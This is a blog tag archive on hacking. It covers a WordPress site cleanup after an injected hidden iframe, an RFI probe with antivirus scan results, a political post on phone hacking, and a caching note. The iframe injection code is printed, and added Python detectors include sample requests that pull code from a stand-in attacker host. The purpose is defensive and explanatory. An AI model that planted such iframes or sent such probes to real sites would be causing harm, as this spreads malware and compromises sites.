Tag Archive: Hacking

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

# Apache 2.2-style access control: Allow rules are evaluated first, then Deny,
# so the single Deny below wins for that range and everyone else is let in.
# <Limit> applies only to the listed methods (HEAD is treated as GET); other
# request methods are not restricted by this block.
<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com (now Microsoft!) that shows the various net connections being made to and from one’s PC.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area) fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230.  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above.

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, MySQL database and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – it just gave an indication that I was, and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine.  But to be sure, I downloaded a fresh copy of the theme and checked its footer file – it’s clean!  I then uploaded the whole clean Suffusion theme in its entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.
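The injected footer above has two tell-tale features: an iframe sized 0x0 and a target host that is not the site's own. A file-manager search for one literal string can miss such things, so here is an added example (not code from the blog, WordPress or the Suffusion theme) that scans template files for exactly those features. The sample footer and the host allowlist are constructed for the demo; `scan_tree` walks a real theme directory with the same check.

```python
"""Find hidden iframes and off-site links in theme/template files.

Added example; not code from the blog, WordPress or the Suffusion theme.
It looks for the pattern found in the injected footer: an <iframe> sized
0x0, or an iframe/script/anchor whose target host is not one of the site's
own hosts. The sample footer below is constructed for the demo.
"""
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

# Constructed sample: a footer.php tail with the injected tags from the post,
# plus two legitimate links that must not be flagged.
SAMPLE_FOOTER = """
<div id="footer"><a href="/about/">About</a>
<a href="http://www.strangelyperfect.tv/feed/">RSS</a></div>
<a href="http://tructuyenso.vn" title="Quang cao truc tuyen"> Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>
"""


def _is_zero(value):
    """True for width/height attributes of 0, 0px, 0% and the like."""
    if value is None:
        return False
    digits = value.strip().rstrip("px%").strip()
    return digits.isdigit() and int(digits) == 0


class InjectionScanner(HTMLParser):
    """Collects iframe, script and anchor tags that look injected."""

    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script", "a"):
            return
        # Valueless attributes such as `nosize` arrive as None.
        a = {k: (v or "") for k, v in attrs}
        target = a.get("href") if tag == "a" else a.get("src")
        host = urlparse(target or "").hostname  # None for relative URLs
        reasons = []
        if tag == "iframe" and _is_zero(a.get("width")) and _is_zero(a.get("height")):
            reasons.append("zero-size iframe")
        if host and host.lower() not in self.own_hosts:
            reasons.append(f"off-site {tag} target: {host}")
        if reasons:
            self.findings.append(
                {"tag": tag, "line": self.getpos()[0], "url": target, "reasons": reasons}
            )


def scan_html(text, own_hosts):
    """Return a list of findings for one document."""
    scanner = InjectionScanner(own_hosts)
    scanner.feed(text)
    scanner.close()
    return scanner.findings


def scan_tree(root, own_hosts, suffixes=(".php", ".html", ".htm")):
    """Scan every template file under root (e.g. wp-content/themes)."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_html(path.read_text(errors="replace"), own_hosts)
            if hits:
                report[str(path)] = hits
    return report


if __name__ == "__main__":
    own = ["strangelyperfect.tv", "www.strangelyperfect.tv"]
    for f in scan_html(SAMPLE_FOOTER, own):
        print(f"line {f['line']}: <{f['tag']}> {f['url']} -> {', '.join(f['reasons'])}")
```

Legitimate off-site links (a theme author's credit, a feed aggregator) will show up too, so treat the off-site reason as a review prompt and extend the allowlist as you go; the zero-size iframe reason is the one that almost never has an innocent explanation in a footer.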

A recheck on Sucuri shows my website to be okay now.  See screendump below.   I’ll be using Sucuri a lot more!

Sucuri Site Check


Jesse Willms Hacked

Jesse Willms Ethics Hacked

Jesse Willms Ethics About Page Hacked

I got an auto-alert from a Scamraiders post by Justin Asking saying that a page on one of the plethora of Willms self-promotional websites has been tampered with – and sure enough it has!  See here for the original comment from Justin Asking.

Below is a screenshot of the hacked page, a brief perusal of the rest of the site shows no other tamperings….  Still.  It made me laugh, although having had this website and the Crawling Chaos website hacked by Turks, I know that personally, it’s not a lot of fun.  (I wonder if Willms will post about it and how long it’ll take to fix it…Probably got a lot on his plate, currently!)

Jesse Willms Ethics About Page Hacked


Terror State Chickens Return to Phone Hacking Roost

Introduction

Greenpeace Action

Many years ago when I was living in France and during a prolonged period of French atomic weapon testing on the Moruroa atoll, the Greenpeace ship, Rainbow Warrior, was blown up in a New Zealand harbour. Initially, it was thought to be an accident.

Now, as soon as this happened, I thought “who has most to gain from the sinking of this protest ship?”

I immediately said, “The French” to my partner.  It’s in their interest to get that pesky ship out of their test zone.

Many years passed until finally some French Secret Service agents were collared for the dastardly deed.   President Mitterrand, it turns out, authorised the bombing and thus the death of the Portuguese-Dutch photographer, Fernando Pereira.

Phone Hacking

  1. The news this week is that the sleaze-paper, News of the World (NOTW), part of the nationality-challenged Rupert Murdoch’s empire, hacked many prominent people’s phones in order to gather information.  (News of the World ‘bugging’ claim – Wednesday 8th)
  2. Later, the news was that there was going to be a huge investigation by the police into the allegations. (Police to probe phone hack claims – Thursday 9th).  In fact, PM Brown said, “This raises questions that are serious and will obviously have to be answered.”
  3. A few hours later, and the massive investigation was finished!  (New phone hack inquiry ruled out – Thursday 8th)  Second top Met Cop John Yates said, “No additional evidence has come to light since this case has concluded. I therefore consider that no further investigation is required.”  He also said, “This investigation has not uncovered any evidence to suggest that John Prescott’s phone had been tapped.”

Phone Hacking (E60)

Astonishing Speed

Warning: sarcasm alert! I think it’s amazing that Yates & Co. has managed to sift through all of this evidence in less than half a day!  It’s fantastic!  If only all enquiries were this fast!  Arms to Iraq!  Iraq War!  Cash for Questions!  G20 Tomkinson Death and Kettling tactics!  You know, things would be so much better.

Who Has Most to Gain?

Rupert Murdoch - will he gain?

Going back to my Rainbow Warrior experience, this is the thought that now crosses my mind.  In situations like this, forget the morals and any issues of integrity, personal or national, that arise.  Just look at the question in its starkness.  Who has most to gain?

Well this question really has several parts, or vantage points, if you like, that all supply an answer to the above question.

  • Obviously, The Guardian now gains from extra publicity, their oxygen of business.
  • NOTW originally gained by getting stories, the same oxygen of their business.
  • Robert Peston here (News of the World bugged Sun editor) reveals that all papers were (and still are?) using such tricks.  It’s all their oxygen.

Police Gain.

A key sentence in Robert Peston’s piece (News of the World bugged Sun editor) is near the bottom.  See if you can find it!

This is the relevant chunk, showing the information source as Richard Thomas, recently retired Information Commissioner, and quoted verbatim from Peston’s blog.  Thomas did a huge investigation into phone hacking which was presented before our Parliament, our representatives, in 2007.  This is the chunk below (remember, see if you can spot the key bit!!):

Richard Thomas, 'a champion of civil liberties'. Photo: Michael Stephens/ PA

A good deal of this trade in personal confidential information has already been exposed by Richard Thomas, who has just retired as information commissioner.

In a series of reports and in evidence to the House of Commons culture, media and sport committee, he made a series of disclosures about newspaper activities that he regarded as “prima facie” illegal.

Here’s a statement from him to MPs that he gave in March 2007, which refers to the results of an investigation he carried out into the business relationship between the press and a firm of private investigators (the investigation was given the codename Operation Motorman):

“The first thing I would need to share is that the 3,000 or 4,000 transactions identified… came from a total of 13,000 transactions in this one operation alone. We were careful only to put forward those where there was some sort of hard evidence of the transaction being positively identified as involving a journalist for a newspaper”.

And this is what he cited as the evidence of payments being made by journalists for the information:

“We did have, and we do have still, the statements, the bank statements, the invoices – some of these well-known proprietors were including information such as ‘payment for confidential information’, payment for ‘blagging’ [obtaining information by deception] in some cases – so there was what I might call hard ‘prima facie’ evidence.”


Law Enforcement

However the degree of detail obtained by him about this trade was startling.

Where did the money end up? Well, a flow-chart produced by the office of the information commissioner shows the press employing private detectives who in turn deal with phone companies, call centres, the DVLA and what’s described as “police source”.

Did you spot the last bit of the sentence?  I’ll paraphrase now for emphasis…

Where did the money (paid for hacked information) end up? The information commissioner shows the press employing private detectives who deal with (…) a “police source“.

And there we have it!

Conclusion

Now we know why Yates’ “investigation” finished so quickly.  The former information commissioner tells us in words presented to parliament – to protect the police!

Just remember, this current government has ramped up the “fear factor” over terrorism so much that the police and other services have unparalleled access to all sorts of electronic information.  In fact, by law, telecoms companies are required to keep it.

In this week’s events we’ve seen the Police investigate an event of which they were one of the prime information sources (according to Thomas) and declared “no case to answer”.  They are investigator, judge, jury and imprisoner.

As I’ve predicted many times in these pages, (and I’m only using history as a guide here, remember – I’m not a fortune teller), when the police are given unbridled power, that power will be abused either by an individual or the organisation as a whole.

The police now have power of arrest for virtually anything – e.g. by law, I’m not allowed to take their photo!  I can be arrested and searched without reason and imprisoned for the same reasons indefinitely.  Just look.  It’s all there, all passed in the last few years.

But if this case and previous ones are anything to go by, it appears that if an “investigator” can’t get the information they want, they pay the police for it!

What have we got here – the Rockford Files!

And afterwards, the Police say “no case”.  “Case closed”. “No further information”.

Our chickens have come home to roost, and no-one’s noticing!

PostScript

Actually, someone’s noticing.

Director of Public Prosecutions Keir Starmer launches 'urgent' review of phone tap inquiry Photo: PA

The police have decided to do nothing because, as they say, no NEW information is about (this is now being mis-quoted as “There is no information that John Prescott’s phone was tapped” instead of “There is no NEW information that John Prescott’s phone was tapped” – which is a different thing altogether, and those saying it know it!)

  • However, it’s now emerging that many “stars” and “personalities” are planning to sue the NOTW and other papers.  See Stars ‘may sue’ over phone claims
  • Also, the DPP has launched an inquiry.
  • The PCC likewise.
  • Parliament too.
  • And calls for the police to do the right thing and investigate properly are mounting.

I watch with anticipation from my little tank.  I’ve a feeling, and I hope, that this one will run and run and that hopefully, some proper rein will be put on our law enforcement folk.  Unlike most people, I don’t consider this a press freedom issue – I consider it a key part of all our freedoms.


Hacking Attempt Today via FoxReality

Multiple Attempts to Drop Trojan on This Website Failed

These are the Wassup details of the attack

69.65.41.165 2009-06-13 10:48:00

  • User Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
  • OS: WinVista
  • BROWSER: IE 7

As you can see, SERVER[DOCUMENT ROOT]= is a piece of PHP code, and they’ve attempted to change my document root to that of http://web.archive.org/web/20130611185214/http://www.foxreality.com/ which is part of Rupert Murdoch’s empire.

NOD32 NAC Trojan

The hyperlinks above don’t work as the code failed. However, if you are brave, strip out the first bit and just go to as I did, and hopefully your anti-virus or browser will kick in with a malware warning like mine did!   The malware is identified as a Trojan by my NOD32 anti-virus software as: PHP/Small.NAC trojan
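The WassUp record above is a remote-file-inclusion style probe: a request parameter named after a PHP server variable carrying a full URL, in the hope that a badly written script will include that remote file. The following is an added example, not code from the blog or the WassUp plugin, that picks such requests out of an Apache combined-format access log and counts how many arrive from one address within a short window, which is how a burst like the one the post describes shows up. The hostile URL (`attacker.example`), the request paths and the timestamps are constructed for the demo; only the source IP, date and User-Agent strings come from the post.

```python
"""Flag remote-file-inclusion style probes in Apache combined-format logs.

Added example, not code from the blog or the WassUp plugin. attacker.example
is a placeholder host; the sample requests below are constructed.
"""
import re
from datetime import datetime
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Parameter names that mimic PHP superglobals / server variables.
SUPERGLOBAL_RE = re.compile(r"(_SERVER|DOCUMENT_ROOT|GLOBALS|_REQUEST|_GET|_POST|_COOKIE)")
# A parameter value that is itself an absolute URL (the remote include).
REMOTE_URL_RE = re.compile(r"^\s*(https?|ftps?)://", re.IGNORECASE)

# Constructed sample log: three probes from the post's source IP and one
# ordinary page view from a documentation-range address.
SAMPLE_LOG = """\
69.65.41.165 - - [13/Jun/2009:10:48:00 +0000] "GET /index.php?SERVER[DOCUMENT_ROOT]=http://attacker.example/id.txt? HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
192.0.2.10 - - [13/Jun/2009:10:49:12 +0000] "GET /about/ HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
69.65.41.165 - - [13/Jun/2009:10:51:43 +0000] "GET /wp-content/themes/footer.php?_SERVER[DOCUMENT_ROOT]=http%3A%2F%2Fattacker.example%2Fid.txt%3F HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
69.65.41.165 - - [13/Jun/2009:10:51:50 +0000] "GET /index.php?page=http://attacker.example/id.txt? HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
"""


def parse_log_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def classify_request(path):
    """Return the reasons a request path looks like an RFI probe (empty = clean)."""
    reasons = []
    # parse_qsl already URL-decodes once; decoding again catches double-encoding.
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        if SUPERGLOBAL_RE.search(unquote(name).upper()):
            reasons.append(f"PHP superglobal-style parameter name: {name}")
        if REMOTE_URL_RE.match(unquote(value)):
            reasons.append(f"remote URL supplied in parameter {name}")
    return reasons


def scan_log(text, window_seconds=300):
    """Flag probe requests and compute the largest per-IP burst inside a window."""
    flagged = []
    for line in text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        reasons = classify_request(rec["path"])
        if reasons:
            flagged.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                            "ua": rec["ua"], "reasons": reasons})
    by_ip = {}
    for f in flagged:
        by_ip.setdefault(f["ip"], []).append(f["ts"])
    bursts = {}
    for ip, times in by_ip.items():
        times.sort()
        best = 0
        for i, start in enumerate(times):
            inside = sum(1 for t in times[i:] if (t - start).total_seconds() <= window_seconds)
            best = max(best, inside)
        bursts[ip] = best
    return {"flagged": flagged, "bursts": bursts}


if __name__ == "__main__":
    report = scan_log(SAMPLE_LOG)
    for f in report["flagged"]:
        print(f"{f['ip']} {f['ts']:%H:%M:%S} {f['path']}\n    " + "; ".join(f["reasons"]))
    for ip, n in report["bursts"].items():
        print(f"{ip}: {n} probe(s) within 5 minutes")
```

The two signals are deliberately independent: a superglobal-looking parameter name with a harmless value is still worth a look, and a plain `page=http://...` probe has no superglobal name at all but is caught by the URL check. The burst count is what turns three individually dull 404s into something worth blocking at the host, as the post ended up doing.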

Conclusion

Someone has dumped a piece of malware on the Fox network and is now going round blogs and other websites to get them to point to the trojan and thus spread the nefarious package. It just needs one click!

As I type this, at 2009-06-13 10:51:43 I had two more attacks!!! That’s nine in the last few minutes.
Checking the web for references, I’ve found this Russian webpage where the trojan has been tested against various antivirus programs – about half don’t detect it and it’s from the end of May this year! See link, translated into English.

This is their test:

File test.txt received 2009.05.27 20:52:02 (UTC)
Current status: finished
Result: 16/40 (40%)
Quote:
Antivirus Version Update Result
a-squared 4.0.0.101 2009.05.27 Backdoor.PHP.Small.o!IK
AhnLab-V3 5.0.0.2 2009.05.27 HTML/Xema
AntiVir 7.9.0.168 2009.05.27 BDS/PHP.ali.1
Antiy-AVL 2.0.3.1 2009.05.27 –
Authentium 5.1.2.4 2009.05.27 –
Avast 4.8.1335.0 2009.05.27 –
AVG 8.5.0.339 2009.05.27 BackDoor.Generic_c.BTI
BitDefender 7.2 2009.05.27 Backdoor.PHP.ALI
CAT-QuickHeal 10.00 2009.05.27 –
ClamAV 0.94.1 2009.05.27 PHP.Shell-23
Comodo 1207 2009.05.27 Unclassified Malware
DrWeb 5.0.0.12182 2009.05.27 –
eSafe 7.0.17.0 2009.05.27 –
eTrust-Vet 31.6.6524 2009.05.27 –
F-Prot 4.4.4.56 2009.05.27 –
F-Secure 8.0.14470.0 2009.05.27 Exploit:PHP/Preamble.A
Fortinet 3.117.0.0 2009.05.27 –
GData 19 2009.05.27 Backdoor.PHP.ALI
Ikarus T3.1.1.57.0 2009.05.27 –
K7AntiVirus 7.10.746 2009.05.27 –
Kaspersky 7.0.0.125 2009.05.27 –
McAfee 5628 2009.05.27 –
McAfee+Artemis 5628 2009.05.27 –
McAfee-GW-Edition 6.7.6 2009.05.27 Trojan.Backdoor.PHP.ali.1
Microsoft 1.4701 2009.05.27 –
NOD32 4109 2009.05.27 PHP/Small.NAC
Norman 6.01.05 2009.05.27 –
nProtect 2009.1.8.0 2009.05.27 Backdoor.PHP.ALI
Panda 10.0.0.14 2009.05.27 –
PCTools 4.4.2.0 2009.05.21 PHP.ShellBot.M
Prevx 3.0 2009.05.27 –
Rising 21.31.21.00 2009.05.27 –
Sophos 4.42.0 2009.05.27 Troj/PHPBdoor-A
Sunbelt 3.2.1858.2 2009.05.27 –
Symantec 1.4.4.12 2009.05.27 –
TheHacker 6.3.4.3.332 2009.05.26 –
TrendMicro 8.950.0.1092 2009.05.27 –
VBA32 3.12.10.6 2009.05.27 Backdoor.PHP.Small.o
ViRobot 2009.5.27.1757 2009.05.27 –
VirusBuster 4.6.5.0 2009.05.27 PHP.ShellBot.M
Additional Information
File size: 1165 bytes
MD5…: f1a9b4e4b207cd38641061e1b72d4775
SHA1..: 33c02179e53c19e00897fb0c63501acc0a2233e8
SHA256: 0b3eef46d7111939962db133d2e75530fbb7946d92a33195ca6b7f2e1affe43a
ssdeep: 24:kwauoGPmXvuH6dcFTGPmXvuH6dc4H6dcZ1Mpn6+YvKsLKPXVwuHENNTh:bBoCgMQsCgMQfQu1M5XW0SNl
PEiD..: –
TrID..: File type identification
HyperText Markup Language (100.0%)
PEInfo: –
PDFiD.: –
RDS…: NSRL Reference Data Set

Needless to say I’ve blocked the source IP address now.  It was from GigeNET in Illinois, and they’ve been told!


DB Cache Replaces WP Super Cache

Strangely post on March 18th, 2009
Posted in Technology

Following on from my previous little post about DB Cache, I’ve been using it since that time and it seems to be faster to me from little old Blighty.  I use a USA based host so anything I see has to cross the pond anyway, but in a non-logged-in state, page loading is definitely faster than it was.  WP Super Cache is now consigned to the test bed of history.  Long live DB Cache, ha, ha.

Seriously, DB Cache is faster than no caching and Super Cache from my viewpoint, and in the end, that’s what counts.  And BTW, my permalinks work fine now, Hurrah!

Paradoxically, since this time, my host has had quite a few drop-outs and the web access has been lost intermittently.  One time was due to the database server falling over but the rest have been web server issues as far as I can tell.  The mail server has worked okay even when the web server has been off, as has the customer service system server!  I can’t see how the DB Cache plugin is doing this – it’s just coincidence, I’m 99% sure.  Anyway, I’ve politely told iXWebhosting that their chances are running out and they’ve been very apologetic etc etc.

Watch this space!


© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me